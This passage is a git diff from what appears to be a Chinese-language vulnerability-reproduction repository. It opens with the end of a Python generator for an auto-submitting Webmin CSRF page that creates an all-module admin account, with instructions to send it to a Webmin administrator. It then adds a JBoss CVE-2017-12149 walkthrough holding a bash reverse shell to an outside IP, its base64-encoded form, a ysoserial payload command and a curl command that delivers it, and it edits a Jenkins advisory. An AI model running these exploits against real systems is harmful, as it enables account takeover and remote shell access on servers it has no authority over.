<input type="hidden" name="ipmode" value="0" />
<input type="hidden" name="ips" value="" />
<input type="hidden" name="days&#95;def" value="1" />
<input type="hidden" name="hours&#95;def" value="1" />
<input type="hidden" name="hours&#95;hfrom" value="" />
<input type="hidden" name="hours&#95;mfrom" value="" />
<input type="hidden" name="hours&#95;hto" value="" />
<input type="hidden" name="hours&#95;mto" value="" />
<input type="hidden" name="mod" value="backup&#45;config" />
<input type="hidden" name="mod" value="change&#45;user" />
<input type="hidden" name="mod" value="webmincron" />
<input type="hidden" name="mod" value="usermin" />
<input type="hidden" name="mod" value="webminlog" />
<input type="hidden" name="mod" value="webmin" />
<input type="hidden" name="mod" value="help" />
<input type="hidden" name="mod" value="servers" />
<input type="hidden" name="mod" value="acl" />
<input type="hidden" name="mod" value="bacula&#45;backup" />
<input type="hidden" name="mod" value="init" />
<input type="hidden" name="mod" value="passwd" />
<input type="hidden" name="mod" value="quota" />
<input type="hidden" name="mod" value="mount" />
<input type="hidden" name="mod" value="fsdump" />
<input type="hidden" name="mod" value="ldap&#45;client" />
<input type="hidden" name="mod" value="ldap&#45;useradmin" />
<input type="hidden" name="mod" value="logrotate" />
<input type="hidden" name="mod" value="mailcap" />
<input type="hidden" name="mod" value="mon" />
<input type="hidden" name="mod" value="pam" />
<input type="hidden" name="mod" value="certmgr" />
<input type="hidden" name="mod" value="proc" />
<input type="hidden" name="mod" value="at" />
<input type="hidden" name="mod" value="cron" />
<input type="hidden" name="mod" value="sentry" />
<input type="hidden" name="mod" value="man" />
<input type="hidden" name="mod" value="syslog" />
<input type="hidden" name="mod" value="syslog&#45;ng" />
<input type="hidden" name="mod" value="system&#45;status" />
<input type="hidden" name="mod" value="useradmin" />
<input type="hidden" name="mod" value="apache" />
<input type="hidden" name="mod" value="bind8" />
<input type="hidden" name="mod" value="pserver" />
<input type="hidden" name="mod" value="dhcpd" />
<input type="hidden" name="mod" value="dhcp&#45;dns" />
<input type="hidden" name="mod" value="dovecot" />
<input type="hidden" name="mod" value="exim" />
<input type="hidden" name="mod" value="fetchmail" />
<input type="hidden" name="mod" value="foobar" />
<input type="hidden" name="mod" value="frox" />
<input type="hidden" name="mod" value="jabber" />
<input type="hidden" name="mod" value="ldap&#45;server" />
<input type="hidden" name="mod" value="majordomo" />
<input type="hidden" name="mod" value="htpasswd&#45;file" />
<input type="hidden" name="mod" value="minecraft" />
<input type="hidden" name="mod" value="mysql" />
<input type="hidden" name="mod" value="openslp" />
<input type="hidden" name="mod" value="postfix" />
<input type="hidden" name="mod" value="postgresql" />
<input type="hidden" name="mod" value="proftpd" />
<input type="hidden" name="mod" value="procmail" />
<input type="hidden" name="mod" value="qmailadmin" />
<input type="hidden" name="mod" value="mailboxes" />
<input type="hidden" name="mod" value="sshd" />
<input type="hidden" name="mod" value="samba" />
<input type="hidden" name="mod" value="sendmail" />
<input type="hidden" name="mod" value="spam" />
<input type="hidden" name="mod" value="squid" />
<input type="hidden" name="mod" value="sarg" />
<input type="hidden" name="mod" value="wuftpd" />
<input type="hidden" name="mod" value="webalizer" />
<input type="hidden" name="mod" value="link" />
<input type="hidden" name="mod" value="adsl&#45;client" />
<input type="hidden" name="mod" value="bandwidth" />
<input type="hidden" name="mod" value="fail2ban" />
<input type="hidden" name="mod" value="firewalld" />
<input type="hidden" name="mod" value="ipsec" />
<input type="hidden" name="mod" value="krb5" />
<input type="hidden" name="mod" value="firewall" />
<input type="hidden" name="mod" value="firewall6" />
<input type="hidden" name="mod" value="exports" />
<input type="hidden" name="mod" value="exports&#45;nfs4" />
<input type="hidden" name="mod" value="xinetd" />
<input type="hidden" name="mod" value="inetd" />
<input type="hidden" name="mod" value="pap" />
<input type="hidden" name="mod" value="ppp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;server" />
<input type="hidden" name="mod" value="stunnel" />
<input type="hidden" name="mod" value="shorewall" />
<input type="hidden" name="mod" value="shorewall6" />
<input type="hidden" name="mod" value="itsecur&#45;firewall" />
<input type="hidden" name="mod" value="tcpwrappers" />
<input type="hidden" name="mod" value="idmapd" />
<input type="hidden" name="mod" value="filter" />
<input type="hidden" name="mod" value="burner" />
<input type="hidden" name="mod" value="grub" />
<input type="hidden" name="mod" value="lilo" />
<input type="hidden" name="mod" value="raid" />
<input type="hidden" name="mod" value="lvm" />
<input type="hidden" name="mod" value="fdisk" />
<input type="hidden" name="mod" value="lpadmin" />
<input type="hidden" name="mod" value="smart&#45;status" />
<input type="hidden" name="mod" value="time" />
<input type="hidden" name="mod" value="vgetty" />
<input type="hidden" name="mod" value="iscsi&#45;client" />
<input type="hidden" name="mod" value="iscsi&#45;server" />
<input type="hidden" name="mod" value="iscsi&#45;tgtd" />
<input type="hidden" name="mod" value="iscsi&#45;target" />
<input type="hidden" name="mod" value="cluster&#45;passwd" />
<input type="hidden" name="mod" value="cluster&#45;copy" />
<input type="hidden" name="mod" value="cluster&#45;cron" />
<input type="hidden" name="mod" value="cluster&#45;shell" />
<input type="hidden" name="mod" value="cluster&#45;shutdown" />
<input type="hidden" name="mod" value="cluster&#45;usermin" />
<input type="hidden" name="mod" value="cluster&#45;useradmin" />
<input type="hidden" name="mod" value="cluster&#45;webmin" />
<input type="hidden" name="mod" value="cfengine" />
<input type="hidden" name="mod" value="heartbeat" />
<input type="hidden" name="mod" value="shell" />
<input type="hidden" name="mod" value="custom" />
<input type="hidden" name="mod" value="disk&#45;usage" />
<input type="hidden" name="mod" value="export&#45;test" />
<input type="hidden" name="mod" value="ftelnet" />
<input type="hidden" name="mod" value="filemin" />
<input type="hidden" name="mod" value="flashterm" />
<input type="hidden" name="mod" value="tunnel" />
<input type="hidden" name="mod" value="file" />
<input type="hidden" name="mod" value="phpini" />
<input type="hidden" name="mod" value="cpan" />
<input type="hidden" name="mod" value="htaccess&#45;htpasswd" />
<input type="hidden" name="mod" value="telnet" />
<input type="hidden" name="mod" value="ssh" />
<input type="hidden" name="mod" value="ssh2" />
<input type="hidden" name="mod" value="shellinabox" />
<input type="hidden" name="mod" value="status" />
<input type="hidden" name="mod" value="ajaxterm" />
<input type="hidden" name="mod" value="updown" />
<input type="hidden" name="mod" value="vnc" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
def main():
CSRF_Generator()
if __name__ == '__main__':
main()
```

63
中间件漏洞/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149.md Normal file
View File

@ -0,0 +1,63 @@
# JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149
## 漏洞描述
该漏洞为 Java 反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
参考:
- https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
- https://access.redhat.com/security/cve/cve-2017-12149
## 环境搭建
Vulhub 执行以下命令启动一个 Jboss 6.0 的应用:
```
docker-compose up -d
```
首次执行时会有 1~3 分钟时间初始化,初始化完成后访问 `http://your-ip:8080/` 即可看到 JBoss 默认页面。
![](images/JBoss%205.x%206.x%20反序列化漏洞%20CVE-2017-12149/image-20250813161006310.png)
## 漏洞复现
该漏洞出现在 `/invoker/readonly` 请求中,服务器将用户提交的 POST 内容进行了 Java 反序列化:
![](images/JBoss%205.x%206.x%20反序列化漏洞%20CVE-2017-12149/image-20250813175008227.png)
所以,我们用常规 Java 反序列化漏洞测试方法来复现该漏洞。
### 编写反弹 shell 的命令
我们使用 bash 来反弹 shell但由于 `Runtime.getRuntime().exec()` 中不能使用管道符等 bash 需要的方法,我们需要用进行一次编码。
```
bash -i >& /dev/tcp/10.8.0.1/21 0>&1
# base64 编码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMS8yMSAwPiYx} | {base64,-d} | {bash,-i}
```
### 序列化数据生成
使用 [ysoserial](https://github.com/frohoff/ysoserial) 来复现生成序列化数据,由于 Vulhub 使用的 Java 版本较新,所以选择使用的 gadget 是 CommonsCollections5
```
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
```
### 发送 POC
生成好的 POC 即为 `poc.ser`,将这个文件作为 POST Body 发送至 `/invoker/readonly` 即可:
```
curl -v POST http://your-ip:8080/invoker/readonly -H 'Content-Type: application/data' --data-binary @poc.ser
```
![](images/JBoss%205.x%206.x%20反序列化漏洞%20CVE-2017-12149/image-20250814091229978.png)
监听 21 端口,接收反弹 shell
![](images/JBoss%205.x%206.x%20反序列化漏洞%20CVE-2017-12149/image-20250813173917758.png)

52
中间件漏洞/JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149.md
View File

@ -1,52 +0,0 @@
# JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149
## 漏洞描述
该漏洞为 Java反序列化错误类型存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
参考:
- https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
- https://access.redhat.com/security/cve/cve-2017-12149
## 环境搭建
Vulhub运行测试环境
```
docker-compose up -d
```
首次执行时会有1~3分钟时间初始化初始化完成后访问`http://your-ip:8080/`即可看到JBoss默认页面。
## 漏洞复现
该漏洞出现在`/invoker/readonly`请求中服务器将用户提交的POST内容进行了Java反序列化
![image-20230328155952101](images/image-20230328155952101.png)
所以我们用常规Java反序列化漏洞测试方法来复现该漏洞。
### 编写反弹shell的命令
我们使用bash来反弹shell但由于`Runtime.getRuntime().exec()`中不能使用管道符等bash需要的方法我们需要用进行一次编码。
![image-20230328160010674](images/image-20230328160010674.png)
### 序列化数据生成
使用[ysoserial](https://github.com/frohoff/ysoserial)来复现生成序列化数据由于Vulhub使用的Java版本较新所以选择使用的gadget是CommonsCollections5
```
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
```
### 发送POC
生成好的POC即为poc.ser将这个文件作为POST Body发送至/invoker/readonly即可
![image-20230328160034054](images/image-20230328160034054.png)
成功反弹shell
![image-20230328160045518](images/image-20230328160045518.png)

11
中间件漏洞/Jenkins-CI 远程代码执行漏洞 CVE-2017-1000353.md
View File

@ -2,9 +2,14 @@
## 漏洞描述
攻击者可以将序列化的 Java SignedObject 对象,传输到基于远程处理的 Jenkins CLI这将最终造成反序列化进而绕过现有基于黑名单的保护机制
Jenkins 是一个广泛使用的开源自动化服务器
参考阅读 https://blogs.securiteam.com/index.php/archives/3171
Jenkins 2.56 及更早版本以及 2.46.1 LTS 及更早版本存在未授权的远程代码执行漏洞。这个未经身份验证的远程代码执行漏洞允许攻击者向 Jenkins CLI 传输序列化的 Java `SignedObject` 对象,该对象会使用新的 `ObjectInputStream` 进行反序列化,从而绕过现有的基于黑名单的保护机制。
参考链接:
- [https://www.jenkins.io/security/advisory/2017-04-26/](https://www.jenkins.io/security/advisory/2017-04-26/)
- [https://www.exploit-db.com/exploits/41965](https://www.exploit-db.com/exploits/41965)
## 环境搭建
@ -14,7 +19,7 @@ Vulhub 执行如下命令启动 jenkins 2.46.1
docker-compose up -d
```
等待完全启动成功后,访问 `http://your-ip:8080` 即可看到 jenkins 已成功运行,无需手工安装。
等待服务器完全启动成功后,访问 `http://your-ip:8080` 即可看到 jenkins 已成功运行,无需手工安装。
## 漏洞复现

BIN
中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813161006310.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 158 KiB

BIN
中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813173917758.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 115 KiB

BIN
中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813175008227.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 278 KiB

BIN
中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250814091229978.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 366 KiB

BIN
中间件漏洞/images/image-20230328155952101.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 456 KiB

BIN
中间件漏洞/images/image-20230328160010674.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 22 KiB

BIN
中间件漏洞/images/image-20230328160034054.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 420 KiB

BIN
中间件漏洞/images/image-20230328160045518.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 95 KiB